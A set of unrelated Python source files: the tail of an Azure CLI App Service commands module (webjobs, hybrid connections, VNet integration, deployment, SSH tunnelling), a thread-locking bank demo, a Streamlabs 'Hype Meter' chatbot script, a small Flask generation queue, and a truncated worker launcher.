client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def webapp_list_hc(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return list_hc(cmd, name, resource_group)
else:
print("not a webapp")
def functionapp_list_hc(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return list_hc(cmd, name, resource_group)
else:
print("not a functionapp")
def list_hc(cmd, name, resource_group):
client = web_client_factory(cmd.cli_ctx)
listed_vals = client.web_apps.list_hybrid_connections(resource_group, name)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def webapp_add_hc(cmd, name, resource_group, namespace, hybrid_connection):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return add_hc(cmd, name, resource_group, namespace, hybrid_connection)
else:
print("not a webapp")
def functionapp_add_hc(cmd, name, resource_group, namespace, hybrid_connection):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return add_hc(cmd, name, resource_group, namespace, hybrid_connection)
else:
print("not a functionapp")
def add_hc(cmd, name, resource_group, namespace, hybrid_connection):
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(resource_group, namespace, hybrid_connection)
hy_co_location = hy_co.additional_properties["location"]
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name == "defaultSender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hyrbid connection, and set it
# on webapp
hc = {
"name": hybrid_connection,
"type": hy_co.type,
"location": hy_co_location,
"properties": {
"serviceBusNamespace": id_parameters[8],
"relayName": hybrid_connection,
"relayArmUri": hy_co_info,
"hostName": hostname,
"port": port,
"sendKeyName": "defaultSender",
"sendKeyValue": hy_co_keys.primary_key
}
}
return_hc = web_client.web_apps.set_hybrid_connection(resource_group, name, namespace, hybrid_connection, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, asp, resource_group, namespace, hybrid_connection, key_type):
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group, asp, namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name == "defaultSender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
print("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group, asp, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group, asp,
namespace, hybrid_connection)
def webapp_remove_hc(cmd, resource_group, name, namespace, hybrid_connection):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return remove_hc(cmd, resource_group, name, namespace, hybrid_connection)
else:
print("not a webapp")
def functionapp_remove_hc(cmd, resource_group, name, namespace, hybrid_connection):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return remove_hc(cmd, resource_group, name, namespace, hybrid_connection)
else:
print("not a functionapp")
def remove_hc(cmd, resource_group, name, namespace, hybrid_connection):
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.delete_hybrid_connection(resource_group, name, namespace, hybrid_connection)
def webapp_list_vnet_int(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return list_vnet_int(cmd, name, resource_group)
else:
print("not a webapp")
def functionapp_list_vnet_int(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return list_vnet_int(cmd, name, resource_group)
else:
print("not a functionapp")
def list_vnet_int(cmd, name, resource_group):
client = web_client_factory(cmd.cli_ctx)
result = list(client.web_apps.list_vnet_connections(resource_group, name))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def webapp_add_vnet_int(cmd, name, resource_group, vnet, subnet):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return add_vnet_int(cmd, name, resource_group, vnet, subnet)
else:
print("not a webapp")
def functionapp_add_vnet_int(cmd, name, resource_group, vnet, subnet):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return add_vnet_int(cmd, name, resource_group, vnet, subnet)
else:
print("not a functionapp")
def add_vnet_int(cmd, name, resource_group, vnet, subnet):
# parsing the arm uri in order to extract vnet_name and vnet_resource_group
vnet_id_strings = vnet.split('/')
vnet_resource_group = vnet_id_strings[4]
vnet_name = vnet_id_strings[8]
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
vnet_info = vnet_client.virtual_networks.get(vnet_resource_group, vnet_name)
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group, name)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
print("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
return
subnet_resource_id = vnet_info.id + "/subnets/" + subnet
swiftVnet = {
"id": swift_connection_info.id,
"name": swift_connection_info.name,
"type": swift_connection_info.type,
"location": vnet_info.location,
"properties": {
"subnetResourceId": subnet_resource_id,
"swiftSupported": "true"
}
}
return_vnet = client.web_apps.set_swift_virtual_network_connection(resource_group, name, swiftVnet)
# reformats the vnet entry, removing unecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def webapp_remove_vnet_int(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "app"):
return remove_vnet_int(cmd, name, resource_group)
else:
print("not a webapp")
def functionapp_remove_vnet_int(cmd, name, resource_group):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'get', None)
if (webapp.kind == "functionapp"):
return remove_vnet_int(cmd, name, resource_group)
else:
print("not a functionapp")
def remove_vnet_int(cmd, name, resource_group):
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.delete_swift_virtual_network(resource_group, name)
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def create_deploy_webapp(cmd, name, location=None, sku=None, dryrun=False): # pylint: disable=too-many-statements
import os
client = web_client_factory(cmd.cli_ctx)
# the code to deploy is expected to be the current directory the command is running from
src_dir = os.getcwd()
# if dir is empty, show a message in dry run
do_deployment = False if os.listdir(src_dir) == [] else True
_create_new_rg = True
_create_new_asp = True
_create_new_app = True
_set_build_appSetting = False
# determine the details for app to be created from src contents
lang_details = get_lang_from_content(src_dir)
# we support E2E create and deploy for selected stacks, any other stack, set defaults for os & runtime
# and skip deployment
if lang_details['language'] is None:
do_deployment = False
sku = sku | 'F1'
os_val = OS_DEFAULT
detected_version = '-'
runtime_version = '-'
else:
# update SKU to user set value
if sku is None:
sku = lang_details.get("default_sku")
else:
sku = sku
language = lang_details.get("language")
is_skip_build = language.lower() == STATIC_RUNTIME_NAME
os_val = "Linux" if language.lower() == NODE_RUNTIME_NAME \
or language.lower() == PYTHON_RUNTIME_NAME else OS_DEFAULT
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
full_sku = get_sku_name(sku)
location = set_location(cmd, sku, location)
loc_name = location.replace(" ", "").lower()
is_linux = True if os_val == 'Linux' else False
asp = "appsvc_asp_{}_{}".format(os_val, loc_name)
rg_name = "appsvc_rg_{}_{}".format(os_val, loc_name)
# Resource group: check if default RG is set
default_rg = cmd.cli_ctx.config.get('defaults', 'group', fallback=None)
_create_new_rg = should_create_new_rg(cmd, default_rg, rg_name, is_linux)
src_path = "{}".format(src_dir.replace("\\", "\\\\"))
rg_str = "{}".format(rg_name)
dry_run_str = r""" {
"name" : "%s",
"serverfarm" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"version_detected": "%s",
"version_to_create": "%s"
}
""" % (name, asp, rg_str, full_sku, os_val, location, src_path,
detected_version, runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
# create RG if the RG doesn't already exist
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
_create_new_asp = True
else:
logger.warning("Resource group '%s' already exists.", rg_name)
_create_new_asp = should_create_new_asp(cmd, rg_name, asp, location)
# create new ASP if an existing one cannot be used
if _create_new_asp:
logger.warning("Creating App service plan '%s' ...", asp)
sku_def = SkuDescription(tier=full_sku, name=sku, capacity=(1 if is_linux else None))
plan_def = AppServicePlan(location=loc_name, app_service_plan_name=asp,
sku=sku_def, reserved=(is_linux or None))
client.app_service_plans.create_or_update(rg_name, asp, plan_def)
logger.warning("App service plan creation complete")
_create_new_app = True
else:
logger.warning("App service plan '%s' already exists.", asp)
_create_new_app = should_create_new_app(cmd, rg_name, name)
# create the app
if _create_new_app:
logger.warning("Creating app '%s' ....", name)
create_webapp(cmd, rg_name, name, asp, runtime_version if is_linux else None)
logger.warning("Webapp creation complete")
_set_build_appSetting = True
else:
logger.warning("App '%s' already exists", name)
if do_deployment and not is_skip_build:
# setting the appsettings causes a app restart so we avoid if not needed
_app_settings = get_app_settings(cmd, rg_name, name)
if all(not d for d in _app_settings):
_set_build_appSetting = True
elif '"name": "SCM_DO_BUILD_DURING_DEPLOYMENT", "value": "true"' not in json.dumps(_app_settings[0]):
_set_build_appSetting = True
else:
_set_build_appSetting = False
# update create_json to include the app_url
url = _get_url(cmd, rg_name, name)
if _set_build_appSetting:
# setting to build after deployment
logger.warning("Updating app settings to enable build after deployment")
update_app_settings(cmd, rg_name, name, ["SCM_DO_BUILD_DURING_DEPLOYMENT=true"])
if do_deployment:
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
logger.warning("Preparing to deploy %s contents to app."
"This operation can take a while to complete ...",
'' if is_skip_build else 'and build')
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file afer deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
create_json.update({'app_url': url})
logger.warning("All done.")
return create_json
def _ping_scm_site(cmd, resource_group, name):
# wakeup kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
host_name = name
if slot is not None:
host_name += "-" + slot
tunnel_server = TunnelServer('', port, host_name, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
while s.isAlive() and t.isAlive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, slot=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
else:
create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=slot)
def create_devops_build(cmd, functionapp_name=None, organization_name=None, project_name=None,
overwrite_yaml=None, use_local_settings=None, local_git=None):
from .azure_devops_build_iteractive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name,
overwrite_yaml, use_local_settings,
local_git)
return azure_devops_build_interactive.interactive_azure_devops_build()
|
2_safe_bank.py
|
import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print(f"Transfers complete ({dt.total_seconds():,.2f}) sec")
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10_000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
transfer_lock = RLock()
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
# Not so good:
# transfer_lock.acquire()
#
# from_account.balance -= amount
# time.sleep(.000)
# to_account.balance += amount
#
# transfer_lock.release()
# good!
with transfer_lock: # hold on for all threads
from_account.balance -= amount
time.sleep(.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
with transfer_lock:
current = sum(a.balance for a in accounts)
if current != total:
print("ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
), flush=True)
elif not quiet:
print(f"All good: Consistent account balance: ${total:,}", flush=True)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == '__main__':
main()
|
HypeMeter_StreamlabsSystem.py
|
#---------------------------------------
# Import Libraries
#---------------------------------------
import sys
import clr
import json
import codecs
import os
import time
import threading
clr.AddReference("IronPython.SQLite.dll")
clr.AddReference("IronPython.Modules.dll")
#---------------------------------------
# [Required] Script Information
#---------------------------------------
ScriptName = "Hype Meter"
Website = "github.com/hyperneon"
Description = "Hype Meter Overlay That Fills Based on Chat Phrase/Emote Matches"
Creator = "GameTangent"
Version = "1.1.3"
# ---------------------------------------
# Set Variables
# ---------------------------------------
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
ReadMeFile = os.path.join(os.path.dirname(__file__), "ReadMe.txt")
ScriptSettings = None
# ---------------------------------------
# Script Classes
# ---------------------------------------
class Settings(object):
""" Class to hold the script settings, matching UI_Config.json. """
def __init__(self, settingsfile=None):
""" Load in saved settings file if available else set default values. """
try:
with codecs.open(settingsfile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
except:
#TODO Allow this to take an optional list of phrases to look for intead of single phrase
self.HypePhrases = "gameta5OnFire,casper5CaSpicy"
self.SwitchSceneOnMaxHype = "TestScene"
self.SwitchSceneDelaySeconds = 1
self.EnableSourceOnMaxHype = "TestSource"
self.EnableSourceDelaySeconds = 1
self.EnabledSourceSeconds = 10
self.CommandPermission = "moderator"
self.ResetOnMaxHype = True
self.ResetDelaySeconds = 1
self.CooldownSeconds = 30
self.APIKey = ""
self.LookbackMinutes = 5
self.BlockLengthSeconds = 5
self.HypeLevelCount = 100
self.CountIndividualMatch = False
self.TickTimeSeconds = 5
self.ClipAtMaxHype = True
def Reload(self, jsondata):
""" Reload settings from Chatbot user interface by given json data. """
self.__dict__ = json.loads(jsondata, encoding="utf-8")
return
# ---------------------------------------
# Functions
# ---------------------------------------
def CallbackLogger(response):
""" Logs callback error response in scripts logger. """
parsedresponse = json.loads(response)
if parsedresponse["status"] == "error":
Parent.Log("Hype Meter", parsedresponse["error"])
return
def SwitchSceneDelayTimer(scene, seconds):
""" Switches to a given scene after set seconds. """
counter = 0
while counter < seconds:
time.sleep(1)
counter += 1
Parent.SetOBSCurrentScene(scene, CallbackLogger)
return
def EnableSourceDelayTimer(source, seconds, enabled_seconds):
""" Enables a given source after set seconds. """
counter = 0
while counter < seconds:
time.sleep(1)
counter += 1
Parent.SetOBSSourceRender(source, True, None, CallbackLogger)
if enabled_seconds > 0:
# Start a new thread for the disable timer
threading.Thread(target=DisableSourceTimer, args=(source, enabled_seconds)).start()
return
def DisableSourceTimer(source, seconds):
""" Disables a given source in optional scene after set seconds. """
counter = 0
while counter < seconds:
time.sleep(1)
counter += 1
Parent.SetOBSSourceRender(source, False, None, CallbackLogger)
return
def SendHypeLevelWebsocket(hype_level):
# Broadcast WebSocket Event
payload = {
"hype_level": hype_level
}
Parent.BroadcastWsEvent("EVENT_HYPE_LEVEL", json.dumps(payload))
return
def UpdateEmoteLog(emote_count):
current_time = time.time()
global EmoteLog
global LastLogBlockTime
# Check if we're still within the log block time
if current_time < (LastLogBlockTime + ScriptSettings.BlockLengthSeconds):
# Add emote count to the current block
EmoteLog[-1] += emote_count
else:
# Block time has passed. Create a new block with the current emote count
EmoteLog.append(emote_count)
lookback_length = (ScriptSettings.LookbackMinutes*60) / ScriptSettings.BlockLengthSeconds
EmoteLog = EmoteLog[-lookback_length:]
LastLogBlockTime = current_time
return
def CalculateHypeLevel():
# Simple rolling percent over the period
# Python makes you coerce integers into floats so multiplying by 1.0
hype_level = sum(EmoteLog)/(ScriptSettings.HypeLevelCount*1.0)*100
return hype_level
def ActivateReset():
global AwaitingReset
global OnCooldown
global CooldownStartTime
global EmoteLog
# Parent.Log("Hype Meter", "WE IN HERE")
# Wipe out the EmoteLog
EmoteLog = []
if ScriptSettings.CooldownSeconds:
OnCooldown = True
CooldownStartTime = time.time()
AwaitingReset = False
def ActivateMaximumHype():
global AwaitingReset
global AwaitingResetStartTime
# Do various things depending on what the user has configured
if ScriptSettings.SwitchSceneOnMaxHype:
# Only if the user has input a scene name do we attempt to switch the scene after configured delay
threading.Thread(target=SwitchSceneDelayTimer, args=(ScriptSettings.SwitchSceneOnMaxHype, ScriptSettings.SwitchSceneDelaySeconds)).start()
if ScriptSettings.EnableSourceOnMaxHype:
# Set scene target and call OBS Source Renderer after configured delay
threading.Thread(target=EnableSourceDelayTimer, args=(ScriptSettings.EnableSourceOnMaxHype, ScriptSettings.EnableSourceDelaySeconds, ScriptSettings.EnabledSourceSeconds)).start()
if ScriptSettings.ResetOnMaxHype:
AwaitingReset = True
AwaitingResetStartTime = time.time()
return
#---------------------------------------
# [Required] Initialize Data / Load Only
#---------------------------------------
def Init():
""" Initialize script or startup or reload. """
# Globals
global ScriptSettings
global EmoteLog
global LastLogBlockTime
global LastTickTime
global HypeReached
global AwaitingReset
global AwaitingResetStartTime
global OnCooldown
global CooldownStartTime
global MeterFreeze
# Load saved settings and validate values
ScriptSettings = Settings(SettingsFile)
EmoteLog = []
LastLogBlockTime = 0
LastTickTime = 0
HypeReached = False
AwaitingReset = False
AwaitingResetStartTime = 0
OnCooldown = False
CooldownStartTime = 0
MeterFreeze = False
return
# ---------------------------------------
# Chatbot Save Settings Function
# ---------------------------------------
def ReloadSettings(jsondata):
""" Set newly saved data from UI after user saved settings. """
# Globals
global ScriptSettings
# Reload saved settings and validate values
ScriptSettings.Reload(jsondata)
return
def Execute(data):
global MeterFreeze
# Check if we have a chat message
if data.IsChatMessage():
param_zero = data.GetParam(0).lower()
command_check = param_zero == "!freezehypemeter" or param_zero == "!unfreezehypemeter"
if command_check and Parent.HasPermission(data.User, ScriptSettings.CommandPermission, ""):
MeterFreeze = param_zero == "!freezehypemeter"
elif param_zero == "!maxhypemeter" and Parent.HasPermission(data.User, ScriptSettings.CommandPermission, ""):
# If a mod wants to max out the meter then lets update it with however many are left to pass 100
UpdateEmoteLog(ScriptSettings.HypeLevelCount - sum(EmoteLog) + 1)
elif MeterFreeze == False:
if AwaitingReset or OnCooldown:
# Don't resume calculating things until we're off cooldown
return
# Count how many times the HypePhrases are found in the message
match_count = 0
for phrase in ScriptSettings.HypePhrases.split(','):
match_count += data.Message.count(phrase)
if match_count > 0:
if ScriptSettings.CountIndividualMatch == False:
# If we're counting multiple emotes in the same message as 1 then set to 1
match_count = 1
UpdateEmoteLog(match_count)
return
def Tick():
if AwaitingReset and time.time() - AwaitingResetStartTime >= ScriptSettings.ResetDelaySeconds:
ActivateReset()
if OnCooldown and time.time() - CooldownStartTime >= ScriptSettings.CooldownSeconds:
global OnCooldown
OnCooldown = False
# Every few seconds we'll broadcast the new HypeLevel
if time.time() - LastTickTime >= ScriptSettings.TickTimeSeconds:
global LastTickTime
global HypeReached
# Just in case no one is talking, let's send a zero to allow for decay
UpdateEmoteLog(0)
hype_level = CalculateHypeLevel()
if hype_level > 100 and ScriptSettings.ClipAtMaxHype:
hype_level = 100
SendHypeLevelWebsocket(hype_level)
if MeterFreeze == False:
if hype_level >= 100 and HypeReached == False:
HypeReached = True
ActivateMaximumHype()
if HypeReached == True and hype_level < 100:
HypeReached = False
LastTickTime = time.time()
return
# ---------------------------------------
# Script UI Button Functions
# ---------------------------------------
def OpenReadMe():
""" Open the script readme file in users default .txt application. """
os.startfile(ReadMeFile)
return
|
app.py
|
from typing import Counter
from flask import Flask, request, jsonify
from model import McNLP
from flask_cors import CORS
import json
import threading, queue
app = Flask(__name__)
cors = CORS(app)
model = McNLP()
tasks = queue.Queue()
results = {}
class Task:
def __init__(self,client,string_to_start,temperature=1,max_length=200):
self.client = client
self.string_to_start = string_to_start
self.temperature = temperature
self.max_length = max_length
def generate(self, model):
return model.generate(self.string_to_start,self.temperature,self.max_length).replace('<s>','')
def worker():
while True:
item = tasks.get()
print(f'Working on {item.client} req')
res = item.generate(model)
results[item.client] = res
print(f'Finished {item.client} req')
tasks.task_done()
count = 0
@app.route('/generate', methods=['POST'])
def generate():
global count
# Retrieve the name from url parameter
print("got generate from:")
print(request.remote_addr)
string_to_start = request.json.get("string_to_start", None)
count += 1
try:
temperature = float(request.json.get("temperature"))
max_length = int(request.json.get("max_length"))
print(temperature)
print(max_length)
tasks.put(Task(count,string_to_start,temperature,max_length))
except Exception as identifier:
tasks.put(Task(count,string_to_start))
# For debugging
return json.dumps({'id':count}), 200
@app.route('/getres', methods=['GET'])
def get_result():
print("got get from:")
print(request.args.get('id'))
if int(request.args.get('id')) in results:
rap = results[int(request.args.get('id'))]
del results[int(request.args.get('id'))]
print("ready")
return json.dumps({'ready':True,'rap':rap}), 200
else:
print("not ready")
return json.dumps({'ready':False})
# Return the response in json format
threading.Thread(target=worker, daemon=True).start()
if __name__ == '__main__':
# Threaded option to enable multiple instances for multiple user access support
app.run(threaded=True, port=5000)
|
reigns.py
|
#!/usr/bin/python3
import argparse, multiprocessing, signal
from redis_worker import run as redis_run
from stats_worker import run as stats_run
from common import get_logger
DEFAULT_REDIS_WORKERS = 4
DEFAULT_STATS_INTERVAL = 3600
parser = argparse.ArgumentParser(description="run the stats and redis works all from one place")
parser.add_argument("--redis-workers", default=DEFAULT_REDIS_WORKERS, help="number of redis workers to run")
parser.add_argument("--stats-interval", default=DEFAULT_STATS_INTERVAL, help="time to wait between collecting cached user stats")
args = parser.parse_args()
logger = get_logger(logger_name="ghpn-reigns")
logger.info("starting up!")
def r_worker():
redis_run()
return
# Main
